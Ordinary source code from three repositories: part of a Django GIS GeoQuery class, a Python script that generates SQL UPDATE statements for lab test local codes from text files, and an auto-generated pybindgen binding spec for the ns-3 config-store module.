        # Remove any aggregates marked for reduction from the subquery
        # and move them to the outer AggregateQuery.
        connection = connections[using]
        for alias, aggregate in self.aggregate_select.items():
            if isinstance(aggregate, gis_aggregates.GeoAggregate):
                # NOTE(review): non-extent geo aggregates always need a
                # GeomField for result conversion; extents get one on
                # Oracle too -- presumably Oracle returns geometry for
                # extents as well (confirm against the Oracle backend).
                if not getattr(aggregate, 'is_extent', False) or connection.ops.oracle:
                    self.extra_select_fields[alias] = GeomField()
        return super(GeoQuery, self).get_aggregation(using, force_subq)

    def resolve_aggregate(self, value, aggregate, connection):
        """
        Overridden from the base Query class to handle the conversion of
        GeoAggregate objects (extents and geometry results).
        """
        if isinstance(aggregate, self.aggregates_module.GeoAggregate):
            if aggregate.is_extent:
                if aggregate.is_extent == '3D':
                    return connection.ops.convert_extent3d(value)
                else:
                    return connection.ops.convert_extent(value)
            else:
                return connection.ops.convert_geom(value, aggregate.source)
        else:
            return super(GeoQuery, self).resolve_aggregate(value, aggregate, connection)

    # Private API utilities, subject to change.
    def _geo_field(self, field_name=None):
        """
        Returns the first Geometry field encountered; or specified via the
        `field_name` keyword. The `field_name` may be a string specifying
        the geometry field on this GeoQuery's model, or a lookup string
        to a geometry field via a ForeignKey relation.

        Returns False when no geometry field can be found.
        """
        if field_name is None:
            # Incrementing until the first geographic field is found.
            for fld in self.model._meta.fields:
                if isinstance(fld, GeometryField):
                    return fld
            return False
        else:
            # Otherwise, check by the given field name -- which may be
            # a lookup to a _related_ geographic field.
            return GeoWhereNode._check_geo_field(self.model._meta, field_name)
|
kalwar/openelisglobal-core | refs/heads/develop | liquibase/OE4.2/testCatalogHT_LNSP/scripts/createLocalCode.py | 25 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def trim(name, length):
    """Trim *name* to at most *length* characters, preferring to cut at a
    word boundary.

    Trailing space-separated words are dropped recursively until the name
    fits; when there is no space to cut at, the name is hard-truncated.
    """
    if len(name) <= length:
        return name
    # Cut at the *last* space so each recursion drops one trailing word.
    # (The original used find(), which jumped to the first space and thus
    # collapsed any multi-word name to its first word; it also truncated
    # to a hard-coded 35 instead of the `length` parameter.)
    last_space = name.rfind(" ")
    if last_space == -1:
        return name[:length]
    return trim(name[:last_space], length)
def translate(name):
    """Map the French sample-type label 'Sang total' to its English
    equivalent; any other label is returned unchanged."""
    return 'Blood' if name == 'Sang total' else name
def _read_stripped_lines(path):
    """Return the whitespace-stripped lines of *path* as a list; `with`
    guarantees the handle is closed (the original leaked it on error)."""
    with open(path, 'r') as input_file:
        return [line.strip() for line in input_file]

# Parallel lists: row i of every file describes the same test.
english_test_names = _read_stripped_lines('englishTestName.txt')
french_test_names = _read_stripped_lines('testName.txt')
sample_types = _read_stripped_lines('sampleType.txt')
guids = _read_stripped_lines('guid.txt')

name_results = []
updateString = "update clinlims.test set local_code='"
for row in range(0, len(guids)):
    if guids[row]:
        # Prefer the English name, falling back to French; missing sample
        # types become the generic "variable".
        test_name = english_test_names[row] if english_test_names[row] else french_test_names[row]
        sample_type = sample_types[row] if sample_types[row] else "variable"
        name_results.append(updateString)
        name_results.append(trim(test_name, 35) + "-" + translate(sample_type) + "' where guid = '" + guids[row] + "';\n")

# Write the generated UPDATE statements one directory up.  Opened only
# now, so the output file is no longer truncated before the inputs have
# been read successfully.
with open("../localCode.sql", "w") as result_file:
    for line in name_results:
        result_file.write(line)

# print() form so the script is valid under both Python 2 and Python 3
# (the original `print "..."` statement is a SyntaxError on Python 3).
print("Done look for results in localCode.sql")
|
std05048/Thesis | refs/heads/master | src/config-store/bindings/modulegen__gcc_LP64.py | 42 | from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
    """Error handler that turns wrapper-generation failures into warnings."""
    def handle_error(self, wrapper, exception, traceback_):
        """Warn about the failing wrapper and report it as handled (True)."""
        warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
        return True
# Install the lenient handler globally for this binding-generation run.
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
    """Create and return the top-level pybindgen Module for ns.config_store."""
    return Module('ns.config_store', cpp_namespace='::ns3')
def register_types(module):
    """Register every class and enumeration exposed by the config-store
    bindings (plus the ns3 core types they reference) with *module*.

    NOTE(review): this appears to be an auto-generated pybindgen module
    specification (modulegen); the '##' comments below are emitted by the
    generator and kept verbatim.
    """
    root_module = module.get_root()
    ## callback.h (module 'core'): ns3::CallbackBase [class]
    module.add_class('CallbackBase', import_from_module='ns.core')
    ## file-config.h (module 'config-store'): ns3::FileConfig [class]
    module.add_class('FileConfig', allow_subclassing=True)
    ## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore [class]
    module.add_class('GtkConfigStore')
    ## hash.h (module 'core'): ns3::Hasher [class]
    module.add_class('Hasher', import_from_module='ns.core')
    ## file-config.h (module 'config-store'): ns3::NoneFileConfig [class]
    module.add_class('NoneFileConfig', parent=root_module['ns3::FileConfig'])
    ## object-base.h (module 'core'): ns3::ObjectBase [class]
    module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
    ## type-id.h (module 'core'): ns3::TypeId [class]
    module.add_class('TypeId', import_from_module='ns.core')
    ## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
    module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
    module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
    module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
    ## empty.h (module 'core'): ns3::empty [class]
    module.add_class('empty', import_from_module='ns.core')
    ## config-store.h (module 'config-store'): ns3::ConfigStore [class]
    module.add_class('ConfigStore', parent=root_module['ns3::ObjectBase'])
    ## config-store.h (module 'config-store'): ns3::ConfigStore::Mode [enumeration]
    module.add_enum('Mode', ['LOAD', 'SAVE', 'NONE'], outer_class=root_module['ns3::ConfigStore'])
    ## config-store.h (module 'config-store'): ns3::ConfigStore::FileFormat [enumeration]
    module.add_enum('FileFormat', ['XML', 'RAW_TEXT'], outer_class=root_module['ns3::ConfigStore'])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
    module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
    ## attribute.h (module 'core'): ns3::AttributeAccessor [class]
    module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
    ## attribute.h (module 'core'): ns3::AttributeChecker [class]
    module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
    ## attribute.h (module 'core'): ns3::AttributeValue [class]
    module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
    ## callback.h (module 'core'): ns3::CallbackChecker [class]
    module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
    ## callback.h (module 'core'): ns3::CallbackImplBase [class]
    module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
    ## callback.h (module 'core'): ns3::CallbackValue [class]
    module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
    module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## type-id.h (module 'core'): ns3::TypeIdChecker [class]
    module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
    ## type-id.h (module 'core'): ns3::TypeIdValue [class]
    module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## Register a nested module for the namespace FatalImpl
    nested_module = module.add_cpp_namespace('FatalImpl')
    register_types_ns3_FatalImpl(nested_module)
    ## Register a nested module for the namespace Hash
    nested_module = module.add_cpp_namespace('Hash')
    register_types_ns3_Hash(nested_module)
def register_types_ns3_FatalImpl(module):
    """Register types in the ns3::FatalImpl namespace (none are exposed)."""
    root_module = module.get_root()
def register_types_ns3_Hash(module):
    """Register ns3::Hash namespace types: the Implementation base class,
    the Hash32/Hash64 function-pointer aliases, and the nested
    ns3::Hash::Function namespace."""
    root_module = module.get_root()
    ## hash-function.h (module 'core'): ns3::Hash::Implementation [class]
    module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
    typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash32Function_ptr')
    typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash32Function_ptr*')
    typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash32Function_ptr&')
    typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash64Function_ptr')
    typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash64Function_ptr*')
    typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash64Function_ptr&')
    ## Register a nested module for the namespace Function
    nested_module = module.add_cpp_namespace('Function')
    register_types_ns3_Hash_Function(nested_module)
def register_types_ns3_Hash_Function(module):
    """Register the concrete hash implementations in ns3::Hash::Function
    (Fnv1a, Hash32, Hash64, Murmur3), all derived from Implementation."""
    root_module = module.get_root()
    ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class]
    module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
    ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class]
    module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
    ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class]
    module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
    ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class]
    module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
def register_methods(root_module):
    """Attach constructors and methods to every class registered in
    register_types(), delegating to one register_* helper per class."""
    register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
    register_Ns3FileConfig_methods(root_module, root_module['ns3::FileConfig'])
    register_Ns3GtkConfigStore_methods(root_module, root_module['ns3::GtkConfigStore'])
    register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher'])
    register_Ns3NoneFileConfig_methods(root_module, root_module['ns3::NoneFileConfig'])
    register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
    register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
    register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
    register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
    register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
    register_Ns3ConfigStore_methods(root_module, root_module['ns3::ConfigStore'])
    register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
    register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
    register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
    register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
    register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
    register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
    register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
    register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
    register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
    register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
    register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
    register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
    register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
    register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
    register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
    register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
    register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation'])
    register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a'])
    register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32'])
    register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64'])
    register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3'])
    return
def register_Ns3CallbackBase_methods(root_module, cls):
    """Register constructors and methods of ns3::CallbackBase."""
    ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
    ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
    cls.add_constructor([])
    ## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
    cls.add_method('GetImpl',
                   'ns3::Ptr< ns3::CallbackImplBase >',
                   [],
                   is_const=True)
    ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
    cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
                        visibility='protected')
    ## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
    cls.add_method('Demangle',
                   'std::string',
                   [param('std::string const &', 'mangled')],
                   is_static=True, visibility='protected')
    return
def register_Ns3FileConfig_methods(root_module, cls):
    """Register constructors and (pure virtual) methods of ns3::FileConfig."""
    ## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig() [constructor]
    cls.add_constructor([])
    ## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig(ns3::FileConfig const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::FileConfig const &', 'arg0')])
    ## file-config.h (module 'config-store'): void ns3::FileConfig::Attributes() [member function]
    cls.add_method('Attributes',
                   'void',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    ## file-config.h (module 'config-store'): void ns3::FileConfig::Default() [member function]
    cls.add_method('Default',
                   'void',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    ## file-config.h (module 'config-store'): void ns3::FileConfig::Global() [member function]
    cls.add_method('Global',
                   'void',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    ## file-config.h (module 'config-store'): void ns3::FileConfig::SetFilename(std::string filename) [member function]
    cls.add_method('SetFilename',
                   'void',
                   [param('std::string', 'filename')],
                   is_pure_virtual=True, is_virtual=True)
    return
def register_Ns3GtkConfigStore_methods(root_module, cls):
    """Register constructors and methods of ns3::GtkConfigStore."""
    ## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore(ns3::GtkConfigStore const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::GtkConfigStore const &', 'arg0')])
    ## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore() [constructor]
    cls.add_constructor([])
    ## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureAttributes() [member function]
    cls.add_method('ConfigureAttributes',
                   'void',
                   [])
    ## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureDefaults() [member function]
    cls.add_method('ConfigureDefaults',
                   'void',
                   [])
    return
def register_Ns3Hasher_methods(root_module, cls):
    """Register constructors and methods of ns3::Hasher."""
    ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Hasher const &', 'arg0')])
    ## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor]
    cls.add_constructor([])
    ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor]
    cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')])
    ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function]
    cls.add_method('GetHash32',
                   'uint32_t',
                   [param('char const *', 'buffer'), param('size_t const', 'size')])
    ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function]
    cls.add_method('GetHash32',
                   'uint32_t',
                   [param('std::string const', 's')])
    ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function]
    cls.add_method('GetHash64',
                   'uint64_t',
                   [param('char const *', 'buffer'), param('size_t const', 'size')])
    ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function]
    cls.add_method('GetHash64',
                   'uint64_t',
                   [param('std::string const', 's')])
    ## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function]
    cls.add_method('clear',
                   'ns3::Hasher &',
                   [])
    return
def register_Ns3NoneFileConfig_methods(root_module, cls):
    """Register constructors and virtual-method overrides of
    ns3::NoneFileConfig (the no-op FileConfig implementation)."""
    ## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig(ns3::NoneFileConfig const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::NoneFileConfig const &', 'arg0')])
    ## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig() [constructor]
    cls.add_constructor([])
    ## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Attributes() [member function]
    cls.add_method('Attributes',
                   'void',
                   [],
                   is_virtual=True)
    ## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Default() [member function]
    cls.add_method('Default',
                   'void',
                   [],
                   is_virtual=True)
    ## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Global() [member function]
    cls.add_method('Global',
                   'void',
                   [],
                   is_virtual=True)
    ## file-config.h (module 'config-store'): void ns3::NoneFileConfig::SetFilename(std::string filename) [member function]
    cls.add_method('SetFilename',
                   'void',
                   [param('std::string', 'filename')],
                   is_virtual=True)
    return
def register_Ns3ObjectBase_methods(root_module, cls):
    """Register constructors and methods of ns3::ObjectBase (attribute
    get/set and trace connect/disconnect API)."""
    ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
    cls.add_constructor([])
    ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
    ## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
    cls.add_method('GetAttribute',
                   'void',
                   [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
                   is_const=True)
    ## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
    cls.add_method('GetAttributeFailSafe',
                   'bool',
                   [param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
                   is_const=True)
    ## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
    cls.add_method('SetAttribute',
                   'void',
                   [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
    cls.add_method('SetAttributeFailSafe',
                   'bool',
                   [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceConnect',
                   'bool',
                   [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceConnectWithoutContext',
                   'bool',
                   [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceDisconnect',
                   'bool',
                   [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceDisconnectWithoutContext',
                   'bool',
                   [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
    cls.add_method('ConstructSelf',
                   'void',
                   [param('ns3::AttributeConstructionList const &', 'attributes')],
                   visibility='protected')
    ## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
    cls.add_method('NotifyConstructionCompleted',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    return
def register_Ns3TypeId_methods(root_module, cls):
    """Register the ns3::TypeId wrapper: comparison/stream operators, constructors,
    and all member functions.

    NOTE(review): auto-generated pybindgen scanner output — do not hand-edit logic;
    the registration order of the two 'AddAttribute' overloads determines overload
    resolution order in the generated wrapper.
    """
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
    cls.add_constructor([param('char const *', 'name')])
    ## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
    cls.add_constructor([param('ns3::TypeId const &', 'o')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('AddAttribute',
                   'ns3::TypeId',
                   [param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('AddAttribute',
                   'ns3::TypeId',
                   [param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
    cls.add_method('AddTraceSource',
                   'ns3::TypeId',
                   [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
    cls.add_method('GetAttribute',
                   'ns3::TypeId::AttributeInformation',
                   [param('uint32_t', 'i')],
                   is_const=True)
    ## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
    cls.add_method('GetAttributeFullName',
                   'std::string',
                   [param('uint32_t', 'i')],
                   is_const=True)
    ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
    cls.add_method('GetAttributeN',
                   'uint32_t',
                   [],
                   is_const=True)
